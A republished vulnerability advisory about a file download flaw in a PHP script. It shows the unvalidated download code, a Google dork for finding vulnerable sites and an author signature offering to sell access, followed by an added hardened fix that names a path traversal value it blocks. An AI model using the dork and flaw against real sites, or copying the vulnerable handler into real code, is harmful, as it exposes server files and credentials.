Innovinc International Script Local File Download Vulnerability

2020.02.14
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

/***********************************************************************************
** Exploit Title: Innovinc International Script Local File Download Vulnerability
** Exploit Author: Milad Hacking
** Vendor Homepage : https://innovinc.org/
** Version : 1.1
** Google Dork : inurl:/importantdates intext:"Innovinc International"
** Date: 2020-02-13
** Tested on: Kali Linux / Iceweasel
***********************************************************************************
** Demo :
***********************************************************************************
***********************************************************************************
** Vulnerability code :

<?php
// The path comes straight from the query string and is never validated.
$file = $_GET['file'];
if (file_exists($file)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/pdf');
    // The download name is also taken from the request.
    header('Content-Disposition: attachment; filename='.$_GET['newFile']);
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    // Any file readable by the web server process is sent to the client.
    readfile($file);
    exit;
}
?>

***********************************************************************************
** Special thanks to: iliya Norton - Milad Hacking - N3TC4T - Nazila Blackhat - Babak Kh4t4R
   Mahdi CocAin - Mohammad Samiyi <3
***********************************************************************************
Sell Access And Security Holes
https://fullsec.org
https://telegram.me/Milad_Hacking
Https://telegram.me/TheHackings
http://instagram.com/Milad.Hacking
milad.hacking.blackhat@Gmail.com
***********************************************************************************
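The code above hands `$_GET['file']` to `readfile()` unchecked, which is why a request naming `includes/config.php` returns that file. The following hardened handler is an added example, not the vendor's code or an official patch; the `downloads` directory, the PDF-only rule and the `resolve_download()` helper are assumptions made for illustration.

```php
<?php
// Added example (not the vendor's code): hardened replacement for download.php.
// Assumption: downloadable PDFs live in a dedicated "downloads" directory
// next to this script; the directory name is hypothetical.
declare(strict_types=1);

const DOWNLOAD_DIR = __DIR__ . '/downloads';

// Hypothetical helper: map a requested name to a file inside $baseDir, or null.
function resolve_download(string $requested, string $baseDir): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // basename() drops every directory component, so "includes/config.php"
    // or "../../etc/passwd" can only ever name a file directly inside $base.
    $name = basename(str_replace('\\', '/', $requested));
    if ($name === '' || strtolower(pathinfo($name, PATHINFO_EXTENSION)) !== 'pdf') {
        return null;
    }
    // realpath() resolves symlinks; reject anything that ends up outside $base.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || !is_file($path)
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$req  = $_GET['file'] ?? '';
$path = resolve_download(is_string($req) ? $req : '', DOWNLOAD_DIR);
if ($path === null) {
    http_response_code(404);   // same response for "missing" and "not allowed"
    exit;
}

header('Content-Type: application/pdf');
header('X-Content-Type-Options: nosniff');
// The download name comes from the resolved path, never from the request.
header("Content-Disposition: attachment; filename*=UTF-8''" . rawurlencode(basename($path)));
header('Content-Length: ' . (string) filesize($path));
readfile($path);
exit;
```

Keeping `includes/config.php` and other source files outside the download directory, or outside the web root entirely, means a bypass of this check still exposes no credentials.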



Copyright 2020, cxsecurity.com

 
